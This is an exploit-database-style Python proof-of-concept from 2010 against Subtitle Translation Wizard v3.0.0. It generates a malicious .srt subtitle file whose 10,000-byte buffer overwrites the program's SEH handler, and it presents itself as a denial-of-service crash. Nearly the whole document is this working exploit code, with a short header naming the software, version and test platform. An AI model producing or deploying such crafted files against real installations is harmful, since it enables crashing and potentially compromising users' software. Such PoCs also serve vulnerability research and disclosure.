#!/usr/bin/python |
|
# Exploit Title: Subtitle Translation Wizard v3.0.0 SEH POC |
# Date: Jun 21, 2010 |
# Author: Blake |
# Software Link: |
http://www.upredsun.com/subtitle-translation/download/st-wizard-setup.exe |
# Version: 3.0.0 |
# Tested on: Windows Vista running in VirtualBox |
|
# SEH is overwritten but only unicode compatible pop pop ret addresses are |
in st-wizard.exe (SafeSEH). |
|
print "\n======================================" |
print " Subtitle Translation Wizard v3.0.0 DoS " |
print " Discovered by Blake " |
print "======================================\n" |
|
buffer = "\x41" * 10000 |
|
print "[+] Creating malicious srt file" |
try: |
file = open("poc.srt","w") |
file.write("1\n" + "00:01:48,549 --> 00:01:50,404\n" + buffer) |
file.close() |
print "[+] File created" |
except: |
print "[x] Could not create file" |
|
raw_input("\nPress any key to exit...\n") |
0 条评论。